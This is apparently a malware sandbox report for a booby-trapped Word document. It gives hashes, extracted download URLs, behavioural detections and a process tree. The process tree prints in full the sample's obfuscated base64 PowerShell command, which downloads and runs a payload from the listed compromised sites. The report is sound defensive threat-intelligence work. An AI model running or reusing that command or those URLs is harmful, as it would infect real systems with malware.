Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
101s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
09/09/2024, 05:17
Static task
static1
Behavioral task
behavioral1
Sample
d5b5cfbb95df232743dbad75d02c5575_JaffaCakes118.doc
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
d5b5cfbb95df232743dbad75d02c5575_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
d5b5cfbb95df232743dbad75d02c5575_JaffaCakes118.doc
-
Size
166KB
-
MD5
d5b5cfbb95df232743dbad75d02c5575
-
SHA1
4cd181c06fe8b720867ca8371e4410d3a4898852
-
SHA256
40553c3c1a1a2ff36541fff6d148b3d3a89962869b7d29d3dd978f4957bb53d5
-
SHA512
6cf5a4b94a32af8f2e7f1389a8f6905f30c2380b1f8f67354d0a9b0d09619a9f0b3c7ed4aa3b8536b214fb51260162089d1b7116181718011b535123d9f80d70
-
SSDEEP
1536:pARD3bNqfNpu39IId5a6XP3Mg8afmqTdotKdz/Rek6Ef3Ei9WEvOk:OR1qf69xak3MgxmFKl/R89i9WAOk
Malware Config
Extracted
http://odeftg.com/odeftg.com/S/
http://hbprivileged.com/info/S/
http://equipamentosmix.com/10/U/
http://mianusman.com/cgi-bin/Fo/
https://www.hairlineunisexsalon.com/demo/CyD/
http://liulibug.com/wp-admin/8Aw/
https://fcbc.group/wp-includes/O/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2792 2844 POwersheLL.exe 29 -
Blocklisted process makes network request 4 IoCs
flow pid Process 5 2792 POwersheLL.exe 6 2792 POwersheLL.exe 7 2792 POwersheLL.exe 9 2792 POwersheLL.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POwersheLL.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\TypeLib\{1D2DDA1C-19A7-4621-AA2A-687B8CFA466E} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\TypeLib\{1D2DDA1C-19A7-4621-AA2A-687B8CFA466E}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1D2DDA1C-19A7-4621-AA2A-687B8CFA466E}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1D2DDA1C-19A7-4621-AA2A-687B8CFA466E}\2.0 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1D2DDA1C-19A7-4621-AA2A-687B8CFA466E}\2.0\HELPDIR WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1712 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2792 POwersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2792 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1712 WINWORD.EXE 1712 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1712 wrote to memory of 2160 1712 WINWORD.EXE 33 PID 1712 wrote to memory of 2160 1712 WINWORD.EXE 33 PID 1712 wrote to memory of 2160 1712 WINWORD.EXE 33 PID 1712 wrote to memory of 2160 1712 WINWORD.EXE 33
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d5b5cfbb95df232743dbad75d02c5575_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD JABRAGsAYwBtADEAawB4AD0AKAAoACcAWgAnACsAJwB6AHAAJwApACsAJwAyADUAJwArACcAMABvACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAVQBTAEUAcgBwAFIATwBGAGkAbABFAFwARwAwAFcAcAB2AFoAQQBcAGQAVQB1ADcAYwB6AHQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIAZQBjAHQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBDAFUAUgBJAGAAVABZAFAAYABSAE8AVABvAEMAYABvAEwAIgAgAD0AIAAoACgAJwB0AGwAJwArACcAcwAxADIALAAgACcAKwAnAHQAJwApACsAJwBsAHMAJwArACcAMQAxACcAKwAoACcALAAnACsAJwAgAHQAbABzACcAKQApADsAJABZAF8AcQBsAHkAegA0ACAAPQAgACgAKAAnAFYAZwAnACsAJwAxACcAKQArACcAeQA1ACcAKwAnAGwAJwApADsAJABDAGUAZAA2AHcAMgBpAD0AKAAoACcARwByACcAKwAnADQAJwApACsAKAAnAHkAJwArACcAbwB3AHIAJwApACkAOwAkAFUAZQA0AF8AZgBsAGUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAOQBJACcAKwAoACcAawAnACsAJwBHADAAJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwB2AHoAJwApACsAJwBhACcAKwAoACcAOQBJAGsAJwArACcARAB1AHUANwAnACsAJwBjAHoAdAA5AEkAawAnACkAKQAgACAALQBjAFIARQBwAEwAQQBDAEUAIAAoAFsAQwBoAEEAUgBdADUANwArAFsAQwBoAEEAUgBdADcAMwArAFsAQwBoAEEAUgBdADEAMAA3ACkALABbAEMAaABBAFIAXQA5ADIAKQArACQAWQBfAHEAbAB5AHoANAArACgAJwAuAGUAJwArACcAeABlACcAKQA7ACQAWQBsAGMAcQA4AGsAagA9ACgAJwBFAGcAJwArACgAJwBsAGMANwBfACcAKwAnADcAJwApACkAOwAkAEMAbwA5ADcAcQB0AGsAPQAuACgAJwBuACcAKwAnAGUAdwAnACsAJwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAE4ARQB0AC4AVwBFAEIAQwBsAGkAZQBuAFQAOwAkAFcAZABnAG4AMgBrAGoAPQAoACcAaAAnACsAJwB0AHQAJwArACgAJwBwACcAKwAnADoALwAnACkAKwAnAC8AbwAnACsAJwBkAGUAJwArACgAJwBmACcAKwAnAHQAZwAnACkAKwAnAC4AYwAnACsAJwBvAG0AJwArACgAJwAvACcAKwAnAG8AZABlACcAKQArACgAJwBmAHQAZwAnACsAJwAuAGMAbwBtAC8AJwApACsAKAAnAFMAJwArACcALwAqACcAKQArACgAJwBoAHQAdAAnACsAJwBwACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAnAGgAYgAnACsAJwBwACcAKwAoACcAcgBpACcAKwAnAHYAJwApACsAKAAnAGkAbAAnACsAJwBlACcAKQArACgAJwBnACcAKwAnAGUAZAAnACkAKwAnAC4AYwAnACsAKAAnAG8AbQAvACcAKwAnAGkAJwApACsAKAAnAG4AZgAnACsAJwBvACcAKQArACgAJwAvACcAKwAnAFMALwAqACcAKQArACcAaAAnACsAJwB0ACcAKwAoACcAdABwACcAKwAnADoALwAvAGUAcQAnACkAKwAnAHUAJwArACcAaQAnACsAJwBwACcAKwAoACcAYQBtAGUAJwArACcAbgAnACkAKwAoACcAdABvACcAKwAnAHMAbQBpACcAKQArACcAeAAnACsAJwAuAGMAJwArACgAJwBvACcAKwAnAG0ALwAxACcAKQArACgAJwAwACcAKwAnAC8AVQAnACkAKwAnAC8AJwArACcAKgBoACcAKwAoACcAdAAnACsAJwB0ACcAKwAnAHAAOgAvAC8AbQBpACcAKQArACgAJwBhAG4AdQBzACcAKwAnAG0AYQAnACkAKwAoACcAbgAuACcAKwAnAGMAJwApACsAJwBvACcAKwAoACcAbQAnACsAJwAvAGMAZwBpACcAKQArACcALQBiACcAKwAnAGkAJwArACgAJwBuAC8ARgBvACcAKwAnAC8AJwApACsAJwAqACcAKwAnAGgAJwArACcAdAAnACsAKAAnAHQAcABzADoAJwArACcALwAnACkAKwAnAC8AdwAnACsAJwB3AHcAJwArACgAJwAuAGgAJwArACcAYQBpAHIAbABpAG4AZQB1AG4AaQAnACsAJwBzAGUAeABzACcAKQArACgAJwBhAGwAJwArACcAbwBuAC4AJwApACsAJwBjACcAKwAoACcAbwBtAC8AJwArACcAZAAnACsAJwBlAG0AJwApACsAKAAnAG8ALwBDAHkAJwArACcARAAnACsAJwAvACoAJwApACsAJwBoAHQAJwArACgAJwB0AHAAJwArACcAOgAvACcAKQArACgAJwAvAGwAaQB1ACcAKwAnAGwAaQAnACkAKwAnAGIAJwArACgAJwB1AGcALgAnACsAJwBjAG8AJwApACsAJwBtAC8AJwArACgAJwB3AHAAJwArACcALQBhAGQAJwArACcAbQBpAG4ALwAnACkAKwAoACcAOABBAHcAJwArACcALwAqACcAKQArACgAJwBoAHQAJwArACcAdABwAHMAOgAnACsAJwAvAC8AJwApACsAJwBmACcAKwAoACcAYwBiAGMALgAnACsAJwBnACcAKQArACcAcgBvACcAKwAoACcAdQBwACcAKwAnAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACgAJwBpACcAKwAnAG4AYwBsAHUAJwApACsAKAAnAGQAZQBzACcAKwAnAC8ATwAnACsAJwAvACcAKQApAC4AIgBTAFAAYABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEkAaABfAGgAeABwAGIAPQAoACgAJwBUACcAKwAnAGkAZgBrACcAKQArACgAJwBiACcAKwAnAGsAXwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFkAdwBhADAAdwBxADIAIABpAG4AIAAkAFcAZABnAG4AMgBrAGoAKQB7AHQAcgB5AHsAJABDAG8AOQA3AHEAdABrAC4AIgBkAE8AYAB3AE4AYABsAE8AQQBEAEYAaQBsAEUAIgAoACQAWQB3AGEAMAB3AHEAMgAsACAAJABVAGUANABfAGYAbABlACkAOwAkAEoAYgAzAG4AMwA2AGcAPQAoACcAVwBnACcAKwAoACcAegBxAHEAJwArACcAZwAnACkAKwAnAHUAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFUAZQA0AF8AZgBsAGUAKQAuACIAbABgAEUAYABOAGcAdABIACIAIAAtAGcAZQAgADIANQA3ADYANAApACAAewAmACgAJwBJAG4AdgBvAGsAZQAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACgAJABVAGUANABfAGYAbABlACkAOwAkAFoAbQBnAHgAagBzAHQAPQAoACcARwAxACcAKwAoACcAeQBmACcAKwAnAF8AJwApACsAJwA2ADgAJwApADsAYgByAGUAYQBrADsAJABSADEANQBpAHMAYgByAD0AKAAoACcARQBtAHEAJwArACcAMgB3ACcAKQArACcAbgB1ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwB6AGMAMAA1AGEAZAA9ACgAKAAnAEYAZAB0ACcAKwAnAGYAJwApACsAJwBzACcAKwAnAHkANwAnACkA1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD58740067c3d767b8b0085ff6eb380f9e1
SHA114f9ccf6112e2e45d4f065e1fb4af224a1494d20
SHA256fba224eb1d5b9d967d923b87d4e9a6d949aeffbb4253796836e90af3af656984
SHA51291cee92e4e5fd6e7262527f83f6b0b0589b38864c232482a9ffd8f4d19d817e99a7c84993f25a9eaeac6f702ec430ebf0841c3217f3dd1849fcbcccebe5c271b